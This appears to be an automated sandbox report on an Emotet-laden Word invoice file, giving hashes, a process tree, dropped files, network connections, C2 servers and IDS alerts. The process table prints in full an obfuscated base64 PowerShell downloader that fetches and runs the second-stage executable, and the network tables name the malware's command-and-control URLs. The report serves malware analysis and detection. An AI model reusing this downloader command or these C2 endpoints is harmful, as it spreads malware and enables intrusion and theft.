File name: | Factura_B8151034.doc |
Full analysis: | https://app.any.run/tasks/52349be0-23ca-4a68-86b4-9505c4faa639 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | April 25, 2019, 18:50:41 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Apr 25 13:01:00 2019, Last Saved Time/Date: Thu Apr 25 13:01:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 5, Security: 0 |
MD5: | 6D9A875C59118BCA4576DBE81F347503 |
SHA1: | BFD2A5E5A4E79D3B3585847A326D53C65AA8E6D3 |
SHA256: | 225ED35D667AFBE8896F3E78476B8D80E569313E37F2F6E661B602A5399DEADE |
SSDEEP: | 6144:b77HUUUUUUUUUUUUUUUUUUUT52VjSy0h0ZB7dhxebp:b77HUUUUUUUUUUUUUUUUUUUTCeyKaB7+ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:04:25 12:01:00 |
ModifyDate: | 2019:04:25 12:01:00 |
Pages: | 1 |
Words: | - |
Characters: | 5 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 5 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2944 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Factura_B8151034.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2592 | powershell -e JABIAGsAQQBHAFEAYwBRAD0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAFEAJwAsACcAawBaAFgAJwApACwAJwBvAGsAJwAsACcAdwBVACcAKQA7ACQAWgBBAEEAawBBAEIAUQAgAD0AIAAnADMAOAAnADsAJABPAEQAawBrAEMAQQBEAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAEEAWABBACcALAAnAEIAJwApACwAJwBBACcAKQAsACcAcgAxACcAKQA7ACQAUgB3AFEAQwBrAEEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFoAQQBBAGsAQQBCAFEAKwAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlAHgAZQAnACwAJwAuACcAKQA7ACQAcAB3AHgAeABEAEQAawA9ACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAE0AYwBBACcALAAnAGsAJwApACwAJwBVACcALAAnAEEAXwAnACkAOwAkAEUAbwBEAGsAQQAxAEQAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAG4AYABFAGAAVAAuAFcAZQBCAGMAbABpAGAAZQBOAFQAOwAkAEwAWABYAEMAWgBrAD0AKAAiAHsAMwAxAH0AewAxADgAfQB7ADMAMwB9AHsAMwA0AH0AewAxADMAfQB7ADIAOQB9AHsANAAwAH0AewAyADQAfQB7ADYAfQB7ADIAMwB9AHsAMgAwAH0AewAyADUAfQB7ADIAMQB9AHsAOQB9AHsANQB9AHsAMQA3AH0AewAzADcAfQB7ADMAMAB9AHsAMQA0AH0AewAxADAAfQB7ADEANQB9AHsAMQAxAH0AewAxADIAfQB7ADIAOAB9AHsAMwAyAH0AewA0AH0AewAxAH0AewAzADUAfQB7ADMAfQB7ADEAOQB9AHsAMgA2AH0AewAyADIAfQB7ADMAOQB9AHsAMwA2AH0AewAwAH0AewAyADcAfQB7ADMAOAB9AHsANwB9AHsAMgB9AHsAMQA2AH0AewA4AH0AIgAtAGYAIAAnAGMAJwAsACcALgBjACcALAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAgACcALwAnACwAJwB4AHIAOQAnACwAKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnAG4AJwAsACcAYwBnAGkAJwAsACcALQBiAGkAJwApACkALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHAAJwAsACcAbQAvAHcAJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBuACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAaQBvACcALAAnAHAAbAAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAHQAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcALwAnACwAJwBwAHMAOgAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAbQAnACwAJwAvADMAZwAnACkALAAnAHUAbQAnACkALAAnAC8AJwAsACcALwAnACwAJwB0ACcALAAnAGMAJwAsACcAegAnACwAJwBjAEQALwAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBwAC0AYQAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcALwB3ACcALAAnAG8AbQAnACkAKQAsACcAaQByAC4AJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAJwBvAG0ALwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBwAC8AZwAnACwAJwBiAG4AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwA2ADAAJwAsACcANAB1ACcAKQApACwAJwBCAGMAJwAsACcALwBkAGEAJwAsACcAcAA6ACcALAAnAC0AcwAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBtAC8AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcASgAnACwAJwBTAGMAcwAnACkAKQAsACcALwBAAGgAJwAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBNAFoAJwAsACcALwBAACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaAB0AHQAcAAnACwAJwA6AC8AJwApACwAJwAvADkAMQAnACkALAAnAHAAbAAnACwAKAAiAHsANAB9AHsAMQB9AHsAMgB9AHsAMAB9AHsAMwB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAJwB5AHQAJwAsACcALwBiAGEAJwAsACcAYQBzACcALAAnAGgALgBjACcAKQAsACcAaAA0AC8AJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAaAB0AHQAcAA6AC8AJwAsACcAQAAnACkALAAnAG8AJwAsACcAbgAvAFUAJwApACwAJwBnACcALAAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAdABzAC8AJwAsACcARQAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAG4AJwAsACcAYQBwAHMAaABvACcAKQAsACcAaAAxAEcAJwApACwAJwBzAC4AYwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBwADoALwAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBAACcALAAnAGgAdAB0ACcAKQApACwAJwBkAG0AJwAsACcAYQAnACwAJwBoAHQAdAAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBoAGkAJwAsACcALwBzACcAKQAsACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAC8AJwAsACcAZAB1AGsAawAnACkALAAnAGEAbgBrACcALAAnAC8AJwApACwAJwAuAGMAJwAsACcAbwAnACwAJwBwAGgAaQAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBwACcALAAnAHAAcgBlACcAKQAsACcAbwBtACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBnAHIAYQAnACwAJwAyACcAKQAsACcAaQAnACkALgAiAHMAYABwAGwAaQB0ACIAKAAnAEAAJwApADsAJAB6AFgAVQBBAEEAWAA9ACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBBAEEAQQAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBBACcALAAnAEEAQQBBACcAKQAsACcAagAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABZAEQAawBVADEAUQBCAEMAIABpAG4AIAAkAEwAWABYAEMAWgBrACkAewB0AHIAeQB7ACQARQBvAEQAawBBADEARAAuACIARABvAFcATgBgAGwAbwBgAEEARABmAGAAaQBMAGUAIgAoACQAWQBEAGsAVQAxAFEAQgBDACwAIAAkAFIAdwBRAEMAawBBACkAOwAkAFgAMQBVAEEAeAB3AD0AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBpAEQAVQAnACwAJwBaAF8AQQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAUgB3AFEAQwBrAEEAKQAuACIAbABlAGAATgBnAFQASAAiACAALQBnAGUAIAAzADgANAA1ADAAKQAgAHsAJgAoACcASQBuAHYAbwAnACsAJwBrACcAKwAnAGUALQBJAHQAZQBtACcAKQAgACQAUgB3AFEAQwBrAEEAOwAkAE0AUQBvADQAQQBVAF8AVQA9ACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBBAEIAXwAnACwAJwBCAEQAJwApACwAJwBBACcALAAnAFkAJwApADsAYgByAGUAYQBrADsAJABRAEMAWABaAEEAWgA9ACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAgACcAWgAnACwAJwBKACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAWABEADEAJwAsACcAYwBHACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAFoAQQBvAEEAQQBVAEEAPQAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHoAdwAnACwAJwB3AEMARAAnACkALAAnAEEAQQAnACwAJwBEACcAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3176 | "C:\Users\admin\38.exe" | C:\Users\admin\38.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
4080 | --f33b820f | C:\Users\admin\38.exe | 38.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3424 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 38.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3988 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2284 | "C:\Users\admin\AppData\Local\soundser\xXTNd2.exe" | C:\Users\admin\AppData\Local\soundser\xXTNd2.exe | — | soundser.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2924 | --cb6dfdcf | C:\Users\admin\AppData\Local\soundser\xXTNd2.exe | xXTNd2.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2344 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | xXTNd2.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3248 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRFBBD.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2592 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\03FZ5XJCRTUCR8F5EFUZ.temp | — | |
MD5:— | SHA256:— | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:04ADB635A4FA53E289E4CC8225503A85 | SHA256:B5E3E3539685926AE4AB71F1A24674F3225BCA0F1A9896448A1F1AB2F214C605 | |||
2592 | powershell.exe | C:\Users\admin\38.exe | executable | |
MD5:3F5A7865E0EE668A2BFFCA64CBF127CD | SHA256:9C38B0B64EB091EB10521EE5A602940020AFA164615CC93898E771DFF24C97CE | |||
4080 | 38.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:3F5A7865E0EE668A2BFFCA64CBF127CD | SHA256:9C38B0B64EB091EB10521EE5A602940020AFA164615CC93898E771DFF24C97CE | |||
2924 | xXTNd2.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:C269F0952FD0EE6C8AAA2C895B51F1CE | SHA256:C5A51343901F1FA017AA35CA81D3D3894513377FE3FC3637EAEF90159BCAF384 | |||
2592 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF130591.TMP | binary | |
MD5:5F9A7BF5388376D94C2EDCA422810BEC | SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:DD77464B526F44FEC4F1D7A61F3F945D | SHA256:72BE40270A48CC57DA0CD3536CBE09472B020C3B56ADED8DAC653463400BEC19 | |||
3988 | soundser.exe | C:\Users\admin\AppData\Local\soundser\xXTNd2.exe | executable | |
MD5:C269F0952FD0EE6C8AAA2C895B51F1CE | SHA256:C5A51343901F1FA017AA35CA81D3D3894513377FE3FC3637EAEF90159BCAF384 | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$ctura_B8151034.doc | pgc | |
MD5:6541BD882F41DA50C9B478123A518005 | SHA256:9F5B477EA233147D13515EF2198FA504D3B29D9B4DE266FB3B7F538C77C1C612 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3248 | soundser.exe | GET | — | 31.172.86.183:8080 | http://31.172.86.183:8080/whoami.php | DE | — | — | malicious |
3248 | soundser.exe | POST | — | 31.172.86.183:8080 | http://31.172.86.183:8080/arizona/ | DE | — | — | malicious |
2592 | powershell.exe | GET | 200 | 165.227.97.68:80 | http://dukkank.com/wp-admin/Uh4/ | US | executable | 134 Kb | suspicious |
3248 | soundser.exe | POST | 200 | 104.236.185.25:8080 | http://104.236.185.25:8080/between/merge/ringin/merge/ | US | binary | 122 Kb | malicious |
3988 | soundser.exe | POST | 200 | 24.150.44.53:80 | http://24.150.44.53/symbols/odbc/ringin/ | CA | binary | 67.6 Kb | malicious |
3248 | soundser.exe | POST | 200 | 24.150.44.53:80 | http://24.150.44.53/attrib/window/ | CA | binary | 148 b | malicious |
3248 | soundser.exe | POST | 200 | 216.98.148.157:8080 | http://216.98.148.157:8080/entries/enabled/ringin/ | US | binary | 148 b | malicious |
3248 | soundser.exe | GET | 200 | 104.236.185.25:8080 | http://104.236.185.25:8080/whoami.php | US | text | 14 b | malicious |
3248 | soundser.exe | GET | 200 | 216.98.148.157:8080 | http://216.98.148.157:8080/whoami.php | US | text | 14 b | malicious |
3248 | soundser.exe | POST | 200 | 24.150.44.53:80 | http://24.150.44.53/img/ | CA | binary | 894 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3248 | soundser.exe | 24.150.44.53:80 | — | Cogeco Cable | CA | malicious |
3988 | soundser.exe | 24.150.44.53:80 | — | Cogeco Cable | CA | malicious |
2592 | powershell.exe | 165.227.97.68:80 | dukkank.com | Digital Ocean, Inc. | US | suspicious |
3248 | soundser.exe | 188.125.73.26:587 | smtp.mail.yahoo.com | — | CH | unknown |
3248 | soundser.exe | 31.172.86.183:8080 | — | First Colo GmbH | DE | malicious |
3248 | soundser.exe | 216.98.148.157:8080 | — | CariNet, Inc. | US | malicious |
3248 | soundser.exe | 104.236.185.25:8080 | — | Digital Ocean, Inc. | US | malicious |
3248 | soundser.exe | 184.173.151.165:25 | mail.pincol.com.br | SoftLayer Technologies Inc. | US | unknown |
3248 | soundser.exe | 67.227.144.240:465 | mail.supernatura.com.mx | Liquid Web, L.L.C | US | unknown |
3248 | soundser.exe | 188.125.73.26:465 | smtp.mail.yahoo.com | — | CH | unknown |
Domain | IP | Reputation |
---|---|---|
dukkank.com |
| suspicious |
mail.pincol.com.br |
| unknown |
mail.supernatura.com.mx |
| unknown |
smtp.secureserver.net |
| shared |
smtp.juno.com |
| shared |
smtp.mail.yahoo.com |
| shared |
mail.comcast.net |
| shared |
smtp.live.com |
| shared |
smtp.gmail.com |
| shared |
pop.speedy.com.ar |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
2592 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2592 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2592 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3988 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 17 |
3988 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3248 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3248 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3248 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3248 | soundser.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |
3248 | soundser.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |